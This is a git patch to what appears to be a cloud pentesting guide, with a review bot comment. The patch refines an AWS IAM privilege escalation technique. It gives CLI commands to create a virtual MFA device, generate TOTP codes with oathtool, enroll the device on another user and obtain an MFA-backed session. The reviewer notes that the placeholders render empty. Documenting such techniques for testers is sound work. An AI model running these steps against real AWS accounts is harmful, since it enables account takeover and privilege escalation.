From 3963a1ef8a7ad8809e83eae0f10d543a33d46f43 Mon Sep 17 00:00:00 2001 From: Jacob-Ham <99051071+Jacob-Ham@users.noreply.github.com> Date: Tue, 26 May 2026 12:54:52 -0500 Subject: [PATCH] Fixed virtual mfa device creation command, add example TOTP tool, add command for getting mfa backed session --- .../aws-iam-privesc/README.md | 29 +++++++++++++++++-- 1 file changed, 26 insertions(+), 3 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md index 440ff931e..a35a26db9 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md 
@@ -57,17 +57,40 @@ aws iam delete-access-key --access-key-id If you can create a new virtual MFA device and enable it on another user, you can effectively enroll your own MFA for that user and then request an MFA-backed session for their credentials. +**Prerequisites:** + +You can use any tool you want for the TOTP codes - oathtool is easy and lightweight. + +```bash +sudo apt install oathtool +sudo dnf install oathtool +sudo yum install oathtool +``` + **Exploit:** ```bash # Create a virtual MFA device (this returns the serial and the base32 seed) -aws iam create-virtual-mfa-device --virtual-mfa-device-name +aws iam create-virtual-mfa-device --virtual-mfa-device-name \ + --bootstrap-method Base32StringSeed --outfile /path/to/save/mfa-seed.txt -# Generate 2 consecutive TOTP codes from the seed, then enable it for the user -aws iam enable-mfa-device --user-name --serial-number \ +# Generate 2 consecutive TOTP codes from the seed + +oathtool --base32 --totp "" -w 1 + +# Enable the new device for the user +aws iam enable-mfa-device --user-name --serial-number \ --authentication-code1 --authentication-code2 ``` +**Authenticate:** + +Once you have a basic session as the target user, you can use the security token service to get an MFA-backed token. + +```bash +aws sts get-session-token --serial-number --token-code +``` + **Impact:** Direct privilege escalation by taking over a user's MFA enrollment (and then using their permissions). ### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`**
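Review bot: Every placeholder in this hunk renders as empty, so the commands as shown are not valid invocations: `--virtual-mfa-device-name \` has no name, `oathtool --base32 --totp "" -w 1` passes an empty seed, `--user-name --serial-number \` and `--authentication-code1 --authentication-code2` have no values, and `--serial-number --token-code` in the new Authenticate block is the same. This is almost certainly angle-bracket placeholders being swallowed by the markdown renderer; please switch to a form that survives rendering (for example uppercase tokens such as `DEVICE_NAME`, `USER_NAME`, `MFA_SERIAL`, `BASE32_SEED`, `CODE1`, `CODE2`), and apply the same fix to the existing `iam delete-access-key --access-key-id` line in the hunk context. Two smaller documentation points: the comment "this returns the serial and the base32 seed" should say that the serial comes back in the CLI output while the seed is written to the `--outfile` path, so readers know where to look for each; and the Authenticate block would benefit from one sentence noting that `get-session-token` returns temporary credentials (access key, secret, session token) that replace the basic session, since the hunk otherwise leaves the reader with the output but no indication of what to do with it.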